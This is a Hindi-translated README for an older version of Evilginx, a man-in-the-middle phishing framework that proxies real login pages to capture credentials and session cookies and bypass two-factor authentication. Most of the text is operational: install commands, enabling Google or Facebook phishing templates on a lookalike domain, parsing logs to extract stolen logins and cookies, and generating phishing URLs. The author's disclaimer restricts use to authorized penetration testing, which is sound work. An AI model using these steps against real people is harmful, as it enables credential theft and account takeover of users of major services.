
कृपया नया संस्करण उपयोग करें: https://github.com/kgretzky/evilginx2

यह संस्करण पुराना है। कृपया नवीनतम संस्करण का उपयोग करें!
EVILGINX 2: https://github.com/kgretzky/evilginx2
Evilginx एक मैन-इन-द-मिडिल हमला ढांचा है जिसका उपयोग किसी भी वेब सेवा के क्रेडेंशियल्स और सत्र कुकीज़ को फ़िश करने के लिए किया जाता है। इसका कोर Nginx HTTP सर्वर पर चलता है, जो proxy_pass और sub_filter का उपयोग करके HTTP सामग्री को प्रॉक्सी और संशोधित करता है, जबकि क्लाइंट और सर्वर के बीच ट्रैफ़िक को इंटरसेप्ट करता है।
आप मेरे ब्लॉग पर जान सकते हैं कि यह कैसे काम करता है और सब कुछ स्वयं कैसे स्थापित करें:
पहली पोस्ट अब थोड़ी पुरानी: Evilginx - Advanced Phishing With Two-factor Authentication Bypass
Evilginx 1.0 अपडेट: Evilginx 1.0 Update - Up Your Game in 2FA Phishing
Evilginx 1.1 अपडेट: Evilginx 1.1 Update
मैं जानता हूँ कि Evilginx का उपयोग बहुत ही नेफ़रियस उद्देश्यों के लिए किया जा सकता है। यह कार्य केवल एक प्रदर्शन है कि कुशल हमलावर क्या कर सकते हैं। रक्षक की जिम्मेदारी है कि वह रक्षा स्थापित करते समय ऐसे हमलों पर विचार करे और इस फ़िशिंग विधि से बचाव के तरीके खोजे। Evilginx का उपयोग केवल वैध पैठ परीक्षण कार्यों में ही किया जाना चाहिए, फ़िश किए जाने वाले पक्षों से लिखित अनुमति के साथ।
Evilginx एक इंस्टॉलेशन स्क्रिप्ट install.sh प्रदान करता है जो किसी भी Debian wheezy/jessie मशीन पर पूरे पैकेज को फ़ायर और फ़ॉरगेट तरीके से इंस्टॉल करने का ध्यान रखता है।
git clone https://github.com/kgretzky/evilginx
cd evilginx
chmod 700 install.sh
./install.sh
_ _ _
(_) | (_)
_____ ___| | __ _ _ _ __ __ __
/ _ \ \ / / | |/ _` | | '_ \\ \/ /
| __/\ V /| | | (_| | | | | |> <
\___| \_/ |_|_|\__, |_|_| |_/_/\_\
__/ |
by @mrgretzky |___/ v1.0
usage: evilginx.py [-h] {setup,parse,genurl} ...
positional arguments:
{setup,parse,genurl}
setup Configure Evilginx.
parse Parse log file(s).
genurl Generate phishing URL.
optional arguments:
-h, --help show this help message and exit
sites निर्देशिका से दिए गए Evilginx टेम्पलेट का उपयोग करके Nginx सर्वर के साथ उपयोग के लिए साइट कॉन्फ़िगरेशन सक्षम या अक्षम करें।
usage: evilginx.py setup [-h] [-d DOMAIN] [-y]
(-l | --enable ENABLE | --disable DISABLE)
optional arguments:
-h, --help show this help message and exit
-d DOMAIN, --domain DOMAIN
Your phishing domain.
-y Answer all questions with 'Yes'.
-l, --list List available supported apps.
--enable ENABLE Enable following site by name.
--disable DISABLE Disable following site by name.
उपलब्ध साइट कॉन्फ़िगरेशन टेम्पलेट सूचीबद्ध करें:
python evilginx.py setup -l
Listing available supported sites:
- dropbox (/root/evilginx/sites/dropbox/config)
subdomains: www
- google (/root/evilginx/sites/google/config)
subdomains: accounts, ssl
- facebook (/root/evilginx/sites/facebook/config)
subdomains: www, m
- linkedin (/root/evilginx/sites/linkedin/config)
subdomains: www
पूर्व-पंजीकृत फ़िशिंग डोमेन not-really-google.com के साथ google फ़िशिंग साइट सक्षम करें:
python evilginx.py setup --enable google -d not-really-google.com
facebook फ़िशिंग साइट अक्षम करें:
python evilginx.py setup --disable facebook
इंटरसेप्ट किए गए लॉगिन क्रेडेंशियल्स और सत्र कुकीज़ निकालने के लिए Nginx लॉग पार्स करें। डिफ़ॉल्ट रूप से, लॉग logs निर्देशिका में सहेजे जाते हैं, जहाँ evilginx.py स्क्रिप्ट स्थित है। सेटअप चरण में स्वचालित पार्सिंग सक्षम करने के बाद यह स्वचालित रूप से किया जा सकता है।
usage: evilginx.py parse [-h] -s SITE [--debug]
optional arguments:
-h, --help show this help message and exit
-s SITE, --site SITE Name of site to parse logs for ('all' to parse logs
for all sites).
--debug Does not truncate log file after parsing.
केवल google साइट के लिए लॉग पार्स करें:
python evilginx.py parse -s google
सभी उपलब्ध साइटों के लिए लॉग पार्स करें:
python evilginx.py parse -s all
फ़िशिंग URL जनरेट करें जिनका उपयोग आप अपने रेड टीम आकलन में कर सकते हैं।
usage: evilginx.py genurl [-h] -s SITE -r REDIRECT
optional arguments:
-h, --help show this help message and exit
-s SITE, --site SITE Name of site to generate link for.
-r REDIRECT, --redirect REDIRECT
Redirect user to this URL after successful sign-in.
google फ़िशिंग URL जनरेट करें जो सफल लॉगिन पर पीड़ित को rick'roll वीडियो पर पुनर्निर्देशित करेगा:
python evilginx.py genurl -s google -r https://www.youtube.com/watch?v=dQw4w9WgXcQ
Generated following phishing URLs:
: https://accounts.not-really-google.com/ServiceLogin?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ
: https://accounts.not-really-google.com/signin/v2/identifier?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ